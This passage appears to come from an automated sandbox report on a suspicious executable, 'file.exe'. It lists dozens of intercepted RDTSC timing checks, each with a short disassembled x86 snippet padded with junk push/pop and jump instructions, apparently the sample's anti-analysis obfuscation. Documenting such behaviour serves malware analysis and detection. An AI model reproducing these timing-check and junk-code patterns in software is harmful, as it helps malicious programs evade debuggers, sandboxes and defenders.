    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791D18 second address: 791D1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791D1D second address: 791D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192480BCh 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFF192480C4h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7909CD second address: 7909D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7909D1 second address: 7909DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7909DB second address: 7909FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007EFF192B60E6h 0x0000000a jmp 00007EFF192B60F5h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7909FA second address: 790A17 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFF192480B6h 0x00000008 jc 00007EFF192480B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007EFF192480BBh 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790B68 second address: 790B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79698E second address: 7969C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007EFF192480B6h 0x0000000a jp 00007EFF192480B6h 0x00000010 popad 0x00000011 pushad 0x00000012 jno 00007EFF192480B6h 0x00000018 je 00007EFF192480B6h 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 pushad 0x00000024 jc 00007EFF192480B6h 0x0000002a jne 00007EFF192480B6h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795F0A second address: 795F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007EFF192B60E6h 0x0000000a pop ebx 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007EFF192B60E6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795F25 second address: 795F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796090 second address: 796096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F077 second address: 79F07B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79CEE3 second address: 79CF0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192B60EDh 0x00000009 jmp 00007EFF192B60F4h 0x0000000e popad 0x0000000f push ecx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D1C2 second address: 79D201 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFF192480B6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007EFF192480C5h 0x00000018 jmp 00007EFF192480C5h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D201 second address: 79D21E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jc 00007EFF192B60FFh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007EFF192B60EDh 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D81B second address: 79D82B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D82B second address: 79D830 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D830 second address: 79D84D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192480C7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D84D second address: 79D864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007EFF192B60E8h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DB67 second address: 79DB70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DB70 second address: 79DB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DB79 second address: 79DB99 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 jnc 00007EFF192480C5h 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DEA7 second address: 79DEAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79E15E second address: 79E162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79E6CF second address: 79E72A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFF192B60EDh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007EFF192B60EAh 0x0000000f jmp 00007EFF192B60ECh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007EFF192B60F9h 0x0000001f jmp 00007EFF192B60F3h 0x00000024 popad 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EA37 second address: 79EA3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A060F second address: 7A0616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A39E8 second address: 7A39EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A39EE second address: 7A39F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A39F2 second address: 7A39F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A39F6 second address: 7A3A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007EFF192B60E6h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3B5B second address: 7A3B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3B5F second address: 7A3B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192B60F6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3E4F second address: 7A3E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192480BAh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3E5D second address: 7A3E80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007EFF192B60E6h 0x0000000e jmp 00007EFF192B60F5h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3FFB second address: 7A4007 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4007 second address: 7A400D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A400D second address: 7A4013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4013 second address: 7A401C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4183 second address: 7A4187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4187 second address: 7A419D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFF192B60F0h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A419D second address: 7A41AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007EFF192480B6h 0x00000009 jnp 00007EFF192480B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4476 second address: 7A447C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A447C second address: 7A4496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jmp 00007EFF192480BFh 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4496 second address: 7A449A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF95D second address: 7AF9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jc 00007EFF192480B6h 0x00000014 jl 00007EFF192480B6h 0x0000001a jmp 00007EFF192480C1h 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007EFF192480C0h 0x00000026 jmp 00007EFF192480C9h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF9B5 second address: 7AF9C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007EFF192B60F2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF9C2 second address: 7AF9C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFAF5 second address: 7AFB0A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007EFF192B60E6h 0x0000000d jbe 00007EFF192B60E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFC89 second address: 7AFC91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFDD5 second address: 7AFDE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFF63 second address: 7AFF76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007EFF192480B6h 0x0000000a pop ebx 0x0000000b jo 00007EFF192480CBh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFF76 second address: 7AFF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192B60EFh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007EFF192B60E8h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFF94 second address: 7AFFAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF192480C0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFFAA second address: 7AFFAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B011C second address: 7B0126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0902 second address: 7B0906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1001 second address: 7B1005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1005 second address: 7B100A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AEE50 second address: 7AEE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8279 second address: 7B8297 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007EFF192B60E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007EFF192B60F1h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B856B second address: 7B856F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B856F second address: 7B8573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBFEF second address: 7BC002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192480BFh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC002 second address: 7BC092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60EBh 0x00000007 jmp 00007EFF192B60F3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007EFF192B60F7h 0x00000014 pop eax 0x00000015 pushad 0x00000016 jng 00007EFF192B60E6h 0x0000001c jmp 00007EFF192B60F1h 0x00000021 popad 0x00000022 jmp 00007EFF192B60F6h 0x00000027 popad 0x00000028 pushad 0x00000029 push eax 0x0000002a push esi 0x0000002b pop esi 0x0000002c jg 00007EFF192B60E6h 0x00000032 pop eax 0x00000033 jmp 00007EFF192B60EAh 0x00000038 jmp 00007EFF192B60EDh 0x0000003d push edi 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6885 second address: 7C689E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007EFF192480C1h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6431 second address: 7C6464 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007EFF192B60F3h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6464 second address: 7C6468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6468 second address: 7C646C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD3F3 second address: 7CD3F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD3F8 second address: 7CD3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD3FE second address: 7CD404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1EA6 second address: 7D1EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007EFF192B60E6h 0x0000000a push edi 0x0000000b jmp 00007EFF192B60F6h 0x00000010 pop edi 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D9150 second address: 7D917E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007EFF192480C0h 0x0000000a pop edx 0x0000000b jnp 00007EFF192480E2h 0x00000011 pushad 0x00000012 jmp 00007EFF192480BFh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBD03 second address: 7DBD11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jng 00007EFF192B60E8h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB4D second address: 7DBB55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB55 second address: 7DBB59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB59 second address: 7DBB5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB5D second address: 7DBB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB6B second address: 7DBB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB6F second address: 7DBB73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB73 second address: 7DBB80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB80 second address: 7DBB9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007EFF192B60F6h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB9F second address: 7DBBA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBBA7 second address: 7DBBAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBBAB second address: 7DBBBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFA2F second address: 7DFA3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 je 00007EFF192B60F4h 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFA3E second address: 7DFA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4E46 second address: 7E4E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4E51 second address: 7E4E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4E59 second address: 7E4E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4FDA second address: 7E4FE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E52A6 second address: 7E52AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E52AA second address: 7E52BA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFF192480B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E52BA second address: 7E52BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E58BE second address: 7E58DC instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFF192480BEh 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007EFF192480B6h 0x00000010 jno 00007EFF192480C2h 0x00000016 je 00007EFF192480B6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
